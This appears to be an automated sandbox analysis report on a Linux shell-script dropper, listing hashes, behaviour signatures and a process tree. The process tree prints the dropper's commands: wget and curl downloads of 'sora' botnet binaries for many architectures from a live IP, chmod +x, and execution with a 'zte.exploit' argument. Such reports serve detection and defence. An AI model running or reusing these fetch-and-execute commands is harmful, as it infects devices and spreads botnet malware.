Analysis
-
max time kernel
1s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
-
Size
2KB
-
MD5
5ee0ae1a52cdb3d257932d6b048f6846
-
SHA1
074cd5bc461923829a352d3d3b74ca92b72e030a
-
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
-
SHA512
7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1507 chmod 1531 chmod 1519 chmod 1537 chmod 1573 chmod 1579 chmod 1543 chmod 1555 chmod 1561 chmod 1567 chmod 1513 chmod 1525 chmod 1549 chmod 1585 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1508 robben /tmp/robben 1514 robben /tmp/robben 1520 robben /tmp/robben 1526 robben /tmp/robben 1532 robben /tmp/robben 1538 robben /tmp/robben 1544 robben /tmp/robben 1550 robben /tmp/robben 1556 robben /tmp/robben 1562 robben /tmp/robben 1568 robben /tmp/robben 1574 robben /tmp/robben 1580 robben /tmp/robben 1586 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1510 wget 1511 curl 1512 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes
-
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh1⤵
- Writes file to tmp directory
PID:1500 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1501
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1502
-
-
/bin/catcat sora.x862⤵PID:1506
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1508
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1510
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1511
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1512
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1514
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1516
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1517
-
-
/bin/catcat sora.x86_642⤵PID:1518
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1520
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1522
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1523
-
-
/bin/catcat sora.i4682⤵PID:1524
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1526
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1528
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1529
-
-
/bin/catcat sora.i6862⤵PID:1530
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1532
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1535
-
-
/bin/catcat sora.mpsl2⤵PID:1536
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1540
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1541
-
-
/bin/catcat sora.arm42⤵PID:1542
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1544
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1546
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1547
-
-
/bin/catcat sora.arm52⤵PID:1548
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1552
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1553
-
-
/bin/catcat sora.arm62⤵PID:1554
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1556
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1558
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1559
-
-
/bin/catcat sora.arm72⤵PID:1560
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1562
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1565
-
-
/bin/catcat sora.ppc2⤵PID:1566
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1568
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1571
-
-
/bin/catcat sora.ppc440fp2⤵PID:1572
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1574
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1577
-
-
/bin/catcat sora.m68k2⤵PID:1578
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1580
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1582
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1583
-
-
/bin/catcat sora.sh42⤵PID:1584
-
-
/bin/chmodchmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF22⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:1586
-